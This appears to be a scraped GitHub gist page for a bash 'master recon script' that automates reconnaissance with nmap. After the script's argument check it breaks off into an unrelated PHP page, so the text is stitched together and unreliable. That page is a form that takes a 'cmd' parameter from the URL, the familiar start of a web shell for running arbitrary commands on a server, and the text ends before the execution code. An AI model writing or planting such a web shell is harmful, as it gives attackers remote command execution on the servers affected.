Skip to content

Instantly share code, notes, and snippets.

View dol0han's full-sized avatar
🎯
Focusing

dolohan dol0han

🎯
Focusing
View GitHub Profile
@dol0han
dol0han / master_Recon_script.sh
Last active September 21, 2023 00:03 — forked from manoelt/master_script.sh
Master Script to automate all the recon
#!/bin/bash
if [ -z "$2" ]
then
echo "2nd Argument not supplied"
echo "2nd argument can be basic or advanced,it used for nmap"
echo "Usage : ./master_script.sh domain basic|advanced"
exit 1
fi
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{